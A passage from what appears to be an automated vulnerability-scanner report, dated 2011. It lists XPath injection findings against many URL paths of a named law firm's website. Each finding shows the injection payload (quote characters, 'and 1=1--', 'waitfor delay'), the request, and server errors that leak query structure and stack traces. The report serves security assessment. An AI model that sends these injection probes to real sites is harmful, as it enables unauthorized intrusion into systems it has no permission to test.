X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6693
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.14. http://www.hoganlovells.com/newsmedia/fastfacts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/fastfacts/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:56:15 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.15. http://www.hoganlovells.com/newsmedia/fastfacts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload '%20and%201%3d1--%20 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/fastfacts'%20and%201%3d1--%20/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:56:18 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8120
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.</title>
<style>
body {font-family:"Verda
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.]
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5070035
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) +19
MS.Inter
...[SNIP]...

2.16. http://www.hoganlovells.com/newsmedia/newspubs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'waitfor%20delay'0%3a0%3a20'--/newspubs HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:06:01 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.17. http://www.hoganlovells.com/newsmedia/newspubs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs%2527 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:06:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.18. http://www.hoganlovells.com/newsmedia/newspubs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'waitfor%20delay'0%3a0%3a20'--/newspubs/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.19. http://www.hoganlovells.com/newsmedia/newspubs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.20. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/List HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:10 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8252
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.21. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs%2527/List HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.22. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs/List%2527 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:37 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.23. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.24. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/detail.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/detail.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:55:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.25. http://www.hoganlovells.com/newsmedia/timeline/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/timeline/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:57:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.26. http://www.hoganlovells.com/newsmedia/timeline/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/timeline'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:57:48 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.27. http://www.hoganlovells.com/offices/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /offices/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /offices'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:59 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.28. http://www.hoganlovells.com/ourpeople/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /ourpeople/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /ourpeople'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:00:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6618
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Verdana
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.29. http://www.hoganlovells.com/practiceareas/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
